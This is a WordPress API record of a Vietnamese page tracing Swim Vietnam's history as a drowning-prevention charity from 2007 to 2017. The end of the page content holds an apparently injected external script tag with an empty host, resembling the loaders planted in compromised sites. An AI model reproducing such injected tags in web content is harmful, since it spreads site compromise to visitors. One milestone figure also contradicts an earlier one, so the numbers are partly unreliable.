{"id":15535,"date":"2022-06-19T18:46:43","date_gmt":"2022-06-19T11:46:43","guid":{"rendered":"http:\/\/swimvietnam.com\/?page_id=15535"},"modified":"2022-06-23T22:40:08","modified_gmt":"2022-06-23T15:40:08","slug":"the-challenge","status":"publish","type":"page","link":"https:\/\/swimvietnam.com\/vi\/the-challenge\/","title":{"rendered":"L\u1ecbch s\u1eed"},"content":{"rendered":"<h3>H\u00e0nh tr\u00ecnh ra \u0111\u1eddi c\u1ee7a Swim Vietnam<\/h3>\n<p><span style=\"font-weight: 400;\">T\u1eeb kh\u1edfi ngu\u1ed3n khi\u00eam t\u1ed1n v\u1ec1 b\u1ec3 b\u01a1i trong kh\u00e1ch s\u1ea1n v\u1edbi ch\u01b0\u01a1ng tr\u00ecnh ch\u1ec9 d\u00e0i 6 th\u00e1ng, Swim Vietnam \u0111\u00e3 ph\u00e1t tri\u1ec3n th\u00e0nh t\u1ed5 ch\u1ee9c chuy\u00ean nghi\u1ec7p v\u00e0 \u0111a d\u1ea1ng, v\u00e0 l\u00e0 1 trong nh\u1eefng t\u1ed5 ch\u1ee9c NGO ph\u00f2ng ch\u1ed1ng \u0111u\u1ed1i n\u01b0\u1edbc l\u00e2u n\u0103m nh\u1ea5t v\u00e0 \u0111\u00e1ng tr\u1ecdng nh\u1ea5t khu v\u1ef1c.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2007<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tribob, c\u00e2u l\u1ea1c b\u1ed9 ba m\u00f4n ph\u1ed1i h\u1ee3p b\u01a1i, \u0111\u1ea1p xe v\u00e0 ch\u1ea1y \u1edf Singapore, l\u00e0 nh\u00e0 t\u1ed5 ch\u1ee9c s\u1ef1 ki\u1ec7n th\u1ec3 thao 3 m\u00f4n ph\u1ed1i h\u1ee3p ch\u1ea1y ch\u01b0\u01a1ng tr\u00ecnh b\u01a1i \u0111\u1ea1p ch\u1ea1y \u1edf H\u1ed9i An, mi\u1ec1n Trung Vi\u1ec7t Nam. S\u1ef1 ki\u1ec7n\u00a0 g\u1ed3m c\u00e1c cu\u1ed9c thi \u0111\u1ea5u cho tr\u1ebb em nh\u01b0ng Tribob th\u1ea5y r\u1eb1ng ch\u1ec9 1 v\u00e0i tr\u1ebb \u0111\u1ecba ph\u01b0\u01a1ng bi\u1ebft b\u01a1i v\u00e0 \u0111i\u1ec1u tra th\u00eam t\u1ec9 l\u1ec7 t\u1eed vong do \u0111u\u1ed1i \u0111\u1ebfn kinh ho\u00e0ng \u1edf Vi\u1ec7t Nam.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tribob th\u1ea5y r\u1eb1ng kho\u00e1 h\u1ecdc b\u01a1i sinh t\u1ed3n cho tr\u1ebb l\u00e0 d\u1ef1 \u00e1n tuy\u1ec7t v\u1eddi mang l\u1ea1i cho c\u1ed9ng \u0111\u1ed3ng \u0111\u1ecba ph\u01b0\u01a1ng trong vi\u1ec7c \u0111\u0103ng cai t\u1ed5 ch\u1ee9c thi \u0111\u1ea5u ba m\u00f4n ph\u1ed1i h\u1ee3p. T\u00ecm ra th\u00e1ch th\u1ee9c m\u1edbi v\u00e0 c\u01a1 h\u1ed9i \u0111\u1ec3 trao l\u1ea1i cho c\u1ed9ng \u0111\u1ed3ng, Jo Stewart, ng\u01b0\u1eddi r\u1ea5t say m\u00ea 3 m\u00f4n ph\u1ed1i h\u1ee3p, \u0111\u00e3 b\u01b0\u1edbc v\u00e0o trang qu\u1ea3n l\u00fd ch\u01b0\u01a1ng tr\u00ecnh m\u1edbi n\u00e0y.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2008<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Jo r\u1eddi c\u00f4ng vi\u1ec7c \u0111\u1ea7u t\u01b0 l\u00e2u n\u0103m c\u1ee7a m\u00ecnh \u1edf Singapore v\u00e0 trong tay v\u1edbi s\u1ed1 \u0111i\u1ec7n tho\u1ea1i c\u1ee7a 1 ng\u01b0\u1eddi \u1edf Ph\u00f2ng Du l\u1ecbch H\u1ed9i An v\u00e0 l\u00ean \u0111\u01b0\u1eddng sang Vi\u1ec7t Nam. T\u1ed5 ch\u1ee9c ch\u01b0\u01a1ng tr\u00ecnh d\u1ea1y b\u01a1i? T\u1ea5t c\u1ea3 \u0111i\u1ec1u b\u1ea1n c\u1ea7n l\u00e0 tr\u1ebb em, gi\u00e1o vi\u00ean v\u00e0 1 b\u1ec3 b\u01a1i, ph\u1ea3i kh\u00f4ng? Swim Vietnam \u0111\u00e3 b\u1eaft \u0111\u1ea7u ho\u1ea1t \u0111\u1ed9ng ch\u1ec9 v\u1edbi duy nh\u1ea5t 1 gi\u00e1o vi\u00ean b\u01a1i ng\u01b0\u1eddi Vi\u1ec7t v\u00e0 2 t\u00ecnh nguy\u1ec7n vi\u00ean n\u01b0\u1edbc ngo\u00e0i d\u1ea1y tr\u1ebb em \u0111\u1ecba ph\u01b0\u01a1ng b\u01a1i trong b\u1ec3 kh\u00e1ch s\u1ea1n t\u1ea1i H\u1ed9i An. Kho\u00e1 h\u1ecdc b\u01a1i \u0111\u1ea7u ti\u00ean, ch\u00fang t\u00f4i d\u1ea1y 300 tr\u1ebb. Sau n\u0103m \u0111\u00f3, 30 tr\u1ebb em ho\u00e0n th\u00e0nh th\u1eddi gian \u0111\u1ea7u ti\u00ean cho cu\u1ed9c thi \u0111\u1ea5u Ba m\u00f4n ph\u1ed1i h\u1ee3p Tribob.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2009<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u01b0\u1ee3c trao t\u1eb7ng, ch\u00fang t\u00f4i x\u00e2y b\u1ec3 b\u01a1i \u0111\u1ea7u ti\u00ean, mang l\u1ea1i m\u00f4i tr\u01b0\u1eddng an to\u00e0n v\u00e0 qu\u1ea3n k\u00fd tr\u1ebb em h\u1ecdc b\u01a1i. Nh\u1eefng n\u0103m sau, ch\u00fang t\u00f4i x\u00e2y t\u1ed5ng c\u1ed9ng 8 b\u1ec3 b\u01a1i, trong \u0111\u00f3 v\u00e0i b\u1ec3 th\u00e1o d\u1ee1 \u0111\u01b0\u1ee3c \u0111\u1ec3 ch\u00fang t\u00f4i di chuy\u1ec3n theo nhu c\u1ea7u d\u1ecdc mi\u1ec1n Trung Vi\u1ec7t Nam.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2010<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Ch\u00fang t\u00f4i t\u1ed5 ch\u1ee9c \u0111\u00e0o t\u1ea1o kho\u00e1 d\u1ea1y b\u01a1i cho gi\u00e1o vi\u00ean chu\u1ea9n AUSSWIM cho 30 nh\u00e2n vi\u00ean Vi\u1ec7t Nam. Nh\u1eefng gi\u00e1o vi\u00ean m\u1edbi n\u00e0y gi\u00fap ch\u00fang t\u00f4i t\u0103ng th\u00eam s\u1ed1 tr\u1ebb em \u0111\u01b0\u1ee3c h\u1ecdc b\u01a1i h\u00e0ng n\u0103m.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u1ee9a tr\u1ebb th\u1ee9 1,000 ho\u00e0n th\u00e0nh ch\u01b0\u01a1ng tr\u00ecnh Swim Vietnam!<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2012<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Swim Vietnam tri\u1ec3n khai ch\u01b0\u01a1ng tr\u00ecnh an to\u00e0n n\u01b0\u1edbc trong l\u1edbp m\u1edf ra cho gi\u00e1o vi\u00ean mi\u1ec1n Trung Vi\u1ec7t Nam th\u00f4ng qua quan h\u1ec7 \u0111\u1ed1i t\u00e1c v\u1edbi ch\u00ednh quy\u1ec1n \u0111\u1ecba ph\u01b0\u01a1ng. Ch\u01b0\u01a1ng tr\u00ecnh n\u00e0y \u0111\u1ea1t t\u1edbi h\u00e0ng ngh\u00ecn tr\u1ebb em \u0111\u1ea7u ti\u00ean l\u00e0 h\u1ecdc sinh h\u00e0ng n\u0103m, gi\u00fap tr\u1ebb c\u00f3 ki\u1ebfn th\u1ee9c an to\u00e0n n\u01b0\u1edbc c\u1ea7n thi\u1ebft g\u1ed3m c\u1ea3 ti\u1ebfn h\u00e0nh c\u1ee9u h\u1ed9 an to\u00e0n. \u0110\u1ee9a tr\u1ebb th\u1ee9 5,000 \u0111\u00e3 xong ch\u01b0\u01a1ng tr\u00ecnh Swim Vietnam v\u00e0o th\u00e1ng 6 n\u0103m 2013.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2013<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Hai trong s\u1ed1 gi\u00e1o vi\u00ean ch\u00fang t\u00f4i \u0111\u01b0\u1ee3c \u0111\u00e0o t\u1ea1o l\u00e0m gi\u00e1o vi\u00ean d\u1ea1y gi\u00e1o vi\u00ean v\u00e0 ng\u01b0\u1eddi d\u1eabn, gi\u00fap ch\u00fang t\u00f4i ph\u00e2n b\u1ed5 \u0111\u00e0o t\u1ea1o gi\u00e1o vi\u00ean trong nh\u00e0 v\u00e0 b\u1eb1ng ti\u1ebfng Vi\u1ec7t. Hai n\u0103m sau, r\u1ea5t nhi\u1ec1u gi\u00e1o vi\u00ean b\u01a1i tr\u1edf th\u00e0nh ng\u01b0\u1eddi d\u1eabn AUSTSIWM.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2014<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Swim Vietnam t\u1ed5 ch\u1ee9c kho\u00e1 \u0111\u00e0o t\u1ea1o \u0111\u1ea7u ti\u00ean ch\u01b0\u01a1ng tr\u00ecnh d\u1ea1y v\u00e0 qu\u1ea3n l\u00fd b\u01a1i sinh t\u1ed3n cho c\u00e1c t\u1ed5 ch\u1ee9c \u1edf Vi\u1ec7t Nam. S\u1ed1 tr\u1ebb em \u0111\u0103ng k\u00fd ng\u00e0y gia t\u0103ng.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u1ee9a tr\u1ebb th\u1ee9 1,000 ho\u00e0n th\u00e0nh ch\u01b0\u01a1ng tr\u00ecnh Swim Vietnam th\u00e1ng 4, 2015.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2015<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Swim Vietnam, c\u1ed9ng t\u00e1c c\u00e1c t\u1ed5 ch\u1ee9c NGO kh\u00e1c \u1edf Vi\u1ec7t Nam, b\u1eaft \u0111\u1ea7u th\u1ea3o lu\u1eadn v\u1edbi ch\u00ednh ph\u1ee7 Vi\u1ec7t Nam, t\u1ea1o ra c\u00e1c kho\u00e1 h\u1ecdc b\u01a1i v\u00e0 gi\u00e1o d\u1ee5c an to\u00e0n n\u01b0\u1edbc l\u00e0 1 ph\u1ea7n c\u1ee7a ch\u01b0\u01a1ng tr\u00ecnh qu\u1ed1c gia. Ch\u00fang t\u00f4i \u0111ang t\u01b0 v\u1ea5n ch\u00ednh ph\u1ee7 Vi\u1ec7t Nam ch\u01b0\u01a1ng tr\u00ecnh b\u01a1i sinh t\u1ed3n chu\u1ea9n m\u1ef1c v\u00e0 ch\u01b0\u01a1ng tr\u00ecnh \u0111\u00e0o t\u1ea1o gi\u00e1o vi\u00ean d\u1ea1y b\u01a1i.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">2017<\/span><\/p>\n<p><span style=\"font-weight: 400;\">\u0110\u1ee9a tr\u1ebb th\u1ee9 20,000 ho\u00e0n th\u00e0nh ch\u01b0\u01a1ng tr\u00ecnh Swim Vietnam.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Swim Vietnam v\u1eadn h\u00e0nh ch\u01b0\u01a1ng tr\u00ecnh th\u1eed nghi\u1ec7m, c\u1ed9ng t\u00e1c T\u1ed5 ch\u1ee9c t\u1eeb thi\u1ec7n Children\u2019s Hope in Action v\u00e0 Qu\u1ef9 Kiahn Foundation \u0111\u01b0a ra kho\u00e1 h\u1ecdc b\u01a1i cho tr\u1ebb khuy\u1ebft t\u1eadt trong c\u1ed9ng \u0111\u1ed3ng.<\/span><script src='https:\/\/?v=11.87.33' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>H\u00e0nh tr\u00ecnh ra \u0111\u1eddi c\u1ee7a Swim Vietnam T\u1eeb kh\u1edfi ngu\u1ed3n khi\u00eam t\u1ed1n v\u1ec1 b\u1ec3 b\u01a1i trong kh\u00e1ch s\u1ea1n v\u1edbi ch\u01b0\u01a1ng tr\u00ecnh ch\u1ec9 d\u00e0i 6 th\u00e1ng, Swim Vietnam \u0111\u00e3 ph\u00e1t tri\u1ec3n th\u00e0nh t\u1ed5 ch\u1ee9c chuy\u00ean nghi\u1ec7p v\u00e0 \u0111a d\u1ea1ng, v\u00e0 l\u00e0 1 trong nh\u1eefng t\u1ed5 ch\u1ee9c NGO ph\u00f2ng ch\u1ed1ng \u0111u\u1ed1i n\u01b0\u1edbc l\u00e2u n\u0103m nh\u1ea5t v\u00e0 \u0111\u00e1ng [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"acf":[],"_links":{"self":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15535"}],"collection":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/comments?post=15535"}],"version-history":[{"count":7,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15535\/revisions"}],"predecessor-version":[{"id":15926,"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/pages\/15535\/revisions\/15926"}],"wp:attachment":[{"href":"https:\/\/swimvietnam.com\/vi\/wp-json\/wp\/v2\/media?parent=15535"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}